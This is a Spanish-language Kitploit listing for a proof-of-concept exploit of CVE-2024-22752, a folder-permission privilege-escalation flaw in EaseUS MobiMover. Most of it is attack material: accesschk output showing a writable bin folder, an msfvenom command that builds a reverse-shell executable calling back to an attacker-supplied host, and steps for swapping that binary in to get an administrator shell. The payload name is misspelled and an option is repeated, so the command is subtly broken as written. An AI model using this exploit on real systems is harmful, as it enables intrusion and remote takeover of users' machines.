Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - Permisos inseguros de archivos y carpetas | Kitploit
Herramientas/GitHubGitHub/hacker625/cve-2024-22752
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMala ConfiguraciónExplotación de Binarios
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Permisos inseguros de archivos y carpetas

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

EaseUS MobiMover 6.0.5 Build 21620 - Permisos inseguros de archivos y carpetas

MobiMoverUILaunch.exe sufre de una vulnerabilidad de elevación de privilegios que puede ser aprovechada por un "Usuario autenticado" para modificar el archivo ejecutable del servicio con un binario de su elección dentro de la carpeta bin. La vulnerabilidad existe debido a un conjunto débil de permisos otorgados al "Grupo de Usuarios autenticados", que concede el indicador (M), también conocido como "Privilegio de modificación".

alt text

Página web del proveedor: https://www.easeus.com/
Enlace del software : https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vídeo del PoC: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Crea un archivo binario malicioso en kali linux con msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. Transfiere el archivo 'prepare.exe' creado al host Windows desde Kali con acceso de usuario de bajo nivel

  3. Mueve el archivo binario 'prepare.exe' creado a 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' para reemplazar el anterior con acceso de usuario de bajo nivel

  4. Cuando el administrador ejecute la aplicación, obtendrás una reverse shell como administrador

Descargar herramienta